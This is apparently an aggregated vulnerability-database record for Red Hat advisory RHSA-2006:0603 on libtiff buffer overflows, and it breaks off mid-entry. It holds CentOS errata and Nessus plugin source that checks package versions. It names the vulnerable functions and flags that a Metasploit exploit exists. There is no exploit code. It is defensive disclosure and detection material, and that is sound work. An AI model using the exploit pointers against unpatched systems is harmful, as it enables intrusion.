ID RHSA-2006:0603 Type redhat Reporter RedHat Modified 2018-05-11T23:27:19
Description
The libtiff package contains a library of functions for manipulating TIFF
(Tagged Image File Format) files.
Tavis Ormandy of Google discovered a number of flaws in libtiff during a
security audit. An attacker could create a carefully crafted TIFF file in
such a way that it was possible to cause an application linked with libtiff
to crash or possibly execute arbitrary code. (CVE-2006-3459, CVE-2006-3460,
CVE-2006-3461, CVE-2006-3462, CVE-2006-3463, CVE-2006-3464, CVE-2006-3465)
All users are advised to upgrade to these updated packages, which contain
backported fixes for these issues.
{"centos": [{"lastseen": "2019-05-29T18:33:22", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2006:0603\n\n\nThe libtiff package contains a library of functions for manipulating TIFF\r\n(Tagged Image File Format) files.\r\n\r\nTavis Ormandy of Google discovered a number of flaws in libtiff during a\r\nsecurity audit. An attacker could create a carefully crafted TIFF file in\r\nsuch a way that it was possible to cause an application linked with libtiff\r\nto crash or possibly execute arbitrary code. (CVE-2006-3459, CVE-2006-3460,\r\nCVE-2006-3461, CVE-2006-3462, CVE-2006-3463, CVE-2006-3464, CVE-2006-3465)\r\n\r\nAll users are advised to upgrade to these updated packages, which contain\r\nbackported fixes for these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2006-August/013105.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-August/013107.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-August/013110.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-August/013112.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-August/013113.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-August/013120.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-August/013121.html\n\n**Affected packages:**\nlibtiff\nlibtiff-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2006-0603.html", "modified": "2006-08-05T15:31:00", "published": "2006-08-04T19:40:44", "href": "http://lists.centos.org/pipermail/centos-announce/2006-August/013105.html", "id": "CESA-2006:0603", "title": "libtiff security update", "type": "centos", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:34:16", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2006:0603-01\n\n\nThe libtiff package contains a library of functions for manipulating TIFF\r\n(Tagged Image File Format) files.\r\n\r\nTavis Ormandy of Google discovered a number of flaws in libtiff during a\r\nsecurity audit. An attacker could create a carefully crafted TIFF file in\r\nsuch a way that it was possible to cause an application linked with libtiff\r\nto crash or possibly execute arbitrary code. (CVE-2006-3459, CVE-2006-3460,\r\nCVE-2006-3461, CVE-2006-3462, CVE-2006-3463, CVE-2006-3464, CVE-2006-3465)\r\n\r\nAll users are advised to upgrade to these updated packages, which contain\r\nbackported fixes for these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2006-August/013091.html\n\n**Affected packages:**\nlibtiff\nlibtiff-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/rh21as-errata.html", "modified": "2006-08-03T03:41:45", "published": "2006-08-03T03:41:45", "href": "http://lists.centos.org/pipermail/centos-announce/2006-August/013091.html", "id": "CESA-2006:0603-01", "title": "libtiff security update", "type": "centos", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:34:06", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2006:0648-01\n\n\nThe kdegraphics package contains graphics applications for the K Desktop\r\nEnvironment.\r\n\r\nTavis Ormandy of Google discovered a number of flaws in libtiff during a\r\nsecurity audit. The kfax application contains a copy of the libtiff code\r\nused for parsing TIFF files and is therefore affected by these flaws. \r\nAn attacker who has the ability to trick a user into opening a malicious\r\nTIFF file could cause kfax to crash or possibly execute arbitrary code.\r\n(CVE-2006-3459, CVE-2006-3460, CVE-2006-3461, CVE-2006-3462, CVE-2006-3463,\r\nCVE-2006-3464, CVE-2006-3465)\r\n\r\nRed Hat Enterprise Linux 4 is not vulnerable to these issues as kfax uses\r\nthe shared libtiff library which has been fixed in a previous update.\r\n\r\nUsers of kfax should upgrade to these updated packages, which contain\r\nbackported patches and are not vulnerable to this issue.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2006-August/013184.html\n\n**Affected packages:**\nkdegraphics\nkdegraphics-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/rh21as-errata.html", "modified": "2006-08-29T00:47:15", "published": "2006-08-29T00:47:15", "href": "http://lists.centos.org/pipermail/centos-announce/2006-August/013184.html", "id": "CESA-2006:0648-01", "title": "kdegraphics security update", "type": "centos", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:33:47", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2006:0648\n\n\nThe kdegraphics package contains graphics applications for the K Desktop\r\nEnvironment.\r\n\r\nTavis Ormandy of Google discovered a number of flaws in libtiff during a\r\nsecurity audit. The kfax application contains a copy of the libtiff code\r\nused for parsing TIFF files and is therefore affected by these flaws. \r\nAn attacker who has the ability to trick a user into opening a malicious\r\nTIFF file could cause kfax to crash or possibly execute arbitrary code.\r\n(CVE-2006-3459, CVE-2006-3460, CVE-2006-3461, CVE-2006-3462, CVE-2006-3463,\r\nCVE-2006-3464, CVE-2006-3465)\r\n\r\nRed Hat Enterprise Linux 4 is not vulnerable to these issues as kfax uses\r\nthe shared libtiff library which has been fixed in a previous update.\r\n\r\nUsers of kfax should upgrade to these updated packages, which contain\r\nbackported patches and are not vulnerable to this issue.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2006-August/013180.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-August/013181.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-September/013195.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-September/013198.html\n\n**Affected packages:**\nkdegraphics\nkdegraphics-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2006-0648.html", "modified": "2006-09-06T10:41:04", "published": "2006-08-28T13:40:53", "href": "http://lists.centos.org/pipermail/centos-announce/2006-August/013180.html", "id": "CESA-2006:0648", "title": "kdegraphics security update", "type": "centos", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "nessus": [{"lastseen": "2019-02-21T01:09:20", "bulletinFamily": "scanner", "description": "Updated libtiff packages that fix several security flaws are now available for Red Hat Enterprise Linux.\n\nThis update has been rated as having important security impact by the Red Hat Security Response Team.\n\nThe libtiff package contains a library of functions for manipulating TIFF (Tagged Image File Format) files.\n\nTavis Ormandy of Google discovered a number of flaws in libtiff during a security audit. An attacker could create a carefully crafted TIFF file in such a way that it was possible to cause an application linked with libtiff to crash or possibly execute arbitrary code.\n(CVE-2006-3459, CVE-2006-3460, CVE-2006-3461, CVE-2006-3462, CVE-2006-3463, CVE-2006-3464, CVE-2006-3465)\n\nAll users are advised to upgrade to these updated packages, which contain backported fixes for these issues.", "modified": "2018-11-16T00:00:00", "id": "REDHAT-RHSA-2006-0603.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=22149", "published": "2006-08-04T00:00:00", "title": "RHEL 2.1 / 3 / 4 : libtiff (RHSA-2006:0603)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2006:0603. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(22149);\n script_version (\"1.25\");\n script_cvs_date(\"Date: 2018/11/16 15:19:25\");\n\n script_cve_id(\"CVE-2006-2656\", \"CVE-2006-3459\", \"CVE-2006-3460\", \"CVE-2006-3461\", \"CVE-2006-3462\", \"CVE-2006-3463\", \"CVE-2006-3464\", \"CVE-2006-3465\");\n script_bugtraq_id(19287);\n script_xref(name:\"RHSA\", value:\"2006:0603\");\n\n script_name(english:\"RHEL 2.1 / 3 / 4 : libtiff (RHSA-2006:0603)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated libtiff packages that fix several security flaws are now\navailable for Red Hat Enterprise Linux.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nThe libtiff package contains a library of functions for manipulating\nTIFF (Tagged Image File Format) files.\n\nTavis Ormandy of Google discovered a number of flaws in libtiff during\na security audit. An attacker could create a carefully crafted TIFF\nfile in such a way that it was possible to cause an application linked\nwith libtiff to crash or possibly execute arbitrary code.\n(CVE-2006-3459, CVE-2006-3460, CVE-2006-3461, CVE-2006-3462,\nCVE-2006-3463, CVE-2006-3464, CVE-2006-3465)\n\nAll users are advised to upgrade to these updated packages, which\ncontain backported fixes for these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-2656\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-3459\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-3460\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-3461\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-3462\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-3463\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-3464\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-3465\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2006:0603\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libtiff and / or libtiff-devel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apple iOS MobileMail LibTIFF Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(119, 189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libtiff\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libtiff-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:2.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/08/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/08/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(2\\.1|3|4)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 2.1 / 3.x / 4.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2006:0603\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"libtiff-3.5.7-30.el2.4\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"libtiff-devel-3.5.7-30.el2.4\")) flag++;\n\n if (rpm_check(release:\"RHEL3\", reference:\"libtiff-3.5.7-25.el3.4\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"libtiff-devel-3.5.7-25.el3.4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"libtiff-3.6.1-12\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"libtiff-devel-3.6.1-12\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libtiff / libtiff-devel\");\n }\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:19:10", "bulletinFamily": "scanner", "description": "From Red Hat Security Advisory 2006:0603 :\n\nUpdated libtiff packages that fix several security flaws are now available for Red Hat Enterprise Linux.\n\nThis update has been rated as having important security impact by the Red Hat Security Response Team.\n\nThe libtiff package contains a library of functions for manipulating TIFF (Tagged Image File Format) files.\n\nTavis Ormandy of Google discovered a number of flaws in libtiff during a security audit. An attacker could create a carefully crafted TIFF file in such a way that it was possible to cause an application linked with libtiff to crash or possibly execute arbitrary code.\n(CVE-2006-3459, CVE-2006-3460, CVE-2006-3461, CVE-2006-3462, CVE-2006-3463, CVE-2006-3464, CVE-2006-3465)\n\nAll users are advised to upgrade to these updated packages, which contain backported fixes for these issues.", "modified": "2018-07-18T00:00:00", "id": "ORACLELINUX_ELSA-2006-0603.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=67398", "published": "2013-07-12T00:00:00", "title": "Oracle Linux 3 : libtiff (ELSA-2006-0603)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2006:0603 and \n# Oracle Linux Security Advisory ELSA-2006-0603 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(67398);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/07/18 17:43:55\");\n\n script_cve_id(\"CVE-2006-2656\", \"CVE-2006-3459\", \"CVE-2006-3460\", \"CVE-2006-3461\", \"CVE-2006-3462\", \"CVE-2006-3463\", \"CVE-2006-3464\", \"CVE-2006-3465\");\n script_bugtraq_id(19287);\n script_xref(name:\"RHSA\", value:\"2006:0603\");\n\n script_name(english:\"Oracle Linux 3 : libtiff (ELSA-2006-0603)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2006:0603 :\n\nUpdated libtiff packages that fix several security flaws are now\navailable for Red Hat Enterprise Linux.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nThe libtiff package contains a library of functions for manipulating\nTIFF (Tagged Image File Format) files.\n\nTavis Ormandy of Google discovered a number of flaws in libtiff during\na security audit. An attacker could create a carefully crafted TIFF\nfile in such a way that it was possible to cause an application linked\nwith libtiff to crash or possibly execute arbitrary code.\n(CVE-2006-3459, CVE-2006-3460, CVE-2006-3461, CVE-2006-3462,\nCVE-2006-3463, CVE-2006-3464, CVE-2006-3465)\n\nAll users are advised to upgrade to these updated packages, which\ncontain backported fixes for these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2007-March/000077.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libtiff packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apple iOS MobileMail LibTIFF Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(119, 189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libtiff\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libtiff-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/03/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/08/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^3([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 3\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"libtiff-3.5.7-25.el3.4\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"libtiff-3.5.7-25.el3.4\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"libtiff-devel-3.5.7-25.el3.4\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"libtiff-devel-3.5.7-25.el3.4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libtiff / libtiff-devel\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:09:20", "bulletinFamily": "scanner", "description": "Updated libtiff packages that fix several security flaws are now available for Red Hat Enterprise Linux.\n\nThis update has been rated as having important security impact by the Red Hat Security Response Team.\n\nThe libtiff package contains a library of functions for manipulating TIFF (Tagged Image File Format) files.\n\nTavis Ormandy of Google discovered a number of flaws in libtiff during a security audit. An attacker could create a carefully crafted TIFF file in such a way that it was possible to cause an application linked with libtiff to crash or possibly execute arbitrary code.\n(CVE-2006-3459, CVE-2006-3460, CVE-2006-3461, CVE-2006-3462, CVE-2006-3463, CVE-2006-3464, CVE-2006-3465)\n\nAll users are advised to upgrade to these updated packages, which contain backported fixes for these issues.", "modified": "2018-11-10T00:00:00", "id": "CENTOS_RHSA-2006-0603.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=22161", "published": "2006-08-07T00:00:00", "title": "CentOS 3 / 4 : libtiff (CESA-2006:0603)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2006:0603 and \n# CentOS Errata and Security Advisory 2006:0603 respectively.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(22161);\n script_version(\"1.18\");\n script_cvs_date(\"Date: 2018/11/10 11:49:27\");\n\n script_cve_id(\"CVE-2006-2656\", \"CVE-2006-3459\", \"CVE-2006-3460\", \"CVE-2006-3461\", \"CVE-2006-3462\", \"CVE-2006-3463\", \"CVE-2006-3464\", \"CVE-2006-3465\");\n script_bugtraq_id(19287);\n script_xref(name:\"RHSA\", value:\"2006:0603\");\n\n script_name(english:\"CentOS 3 / 4 : libtiff (CESA-2006:0603)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated libtiff packages that fix several security flaws are now\navailable for Red Hat Enterprise Linux.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nThe libtiff package contains a library of functions for manipulating\nTIFF (Tagged Image File Format) files.\n\nTavis Ormandy of Google discovered a number of flaws in libtiff during\na security audit. An attacker could create a carefully crafted TIFF\nfile in such a way that it was possible to cause an application linked\nwith libtiff to crash or possibly execute arbitrary code.\n(CVE-2006-3459, CVE-2006-3460, CVE-2006-3461, CVE-2006-3462,\nCVE-2006-3463, CVE-2006-3464, CVE-2006-3465)\n\nAll users are advised to upgrade to these updated packages, which\ncontain backported fixes for these issues.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2006-August/013105.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?15313995\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2006-August/013110.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e39be2fb\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2006-August/013120.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ac745cf6\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2006-August/013121.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f193bb64\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libtiff packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apple iOS MobileMail LibTIFF Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(119, 189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libtiff\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libtiff-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/08/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/08/07\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-3\", cpu:\"ia64\", reference:\"libtiff-3.5.7-25.el3.4\")) flag++;\nif (rpm_check(release:\"CentOS-3\", cpu:\"ia64\", reference:\"libtiff-devel-3.5.7-25.el3.4\")) flag++;\n\nif (rpm_check(release:\"CentOS-4\", reference:\"libtiff-3.6.1-12\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"libtiff-devel-3.6.1-12\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:09:21", "bulletinFamily": "scanner", "description": "The remote host is affected by the vulnerability described in GLSA-200608-07 (libTIFF: Multiple vulnerabilities)\n\n Tavis Ormandy of the Google Security Team discovered several heap and stack-based buffer overflows and other flaws in libTIFF. The affected parts include the TIFFFetchShortPair(), TIFFScanLineSize() and EstimateStripByteCounts() functions, and the PixarLog and NeXT RLE decoders.\n Impact :\n\n A remote attacker could entice a user to open a specially crafted TIFF file, resulting in the possible execution of arbitrary code.\n Workaround :\n\n There is no known workaround at this time.", "modified": "2018-07-11T00:00:00", "id": "GENTOO_GLSA-200608-07.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=22165", "published": "2006-08-07T00:00:00", "title": "GLSA-200608-07 : libTIFF: Multiple vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200608-07.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(22165);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2018/07/11 17:09:25\");\n\n script_cve_id(\"CVE-2006-3459\", \"CVE-2006-3460\", \"CVE-2006-3461\", 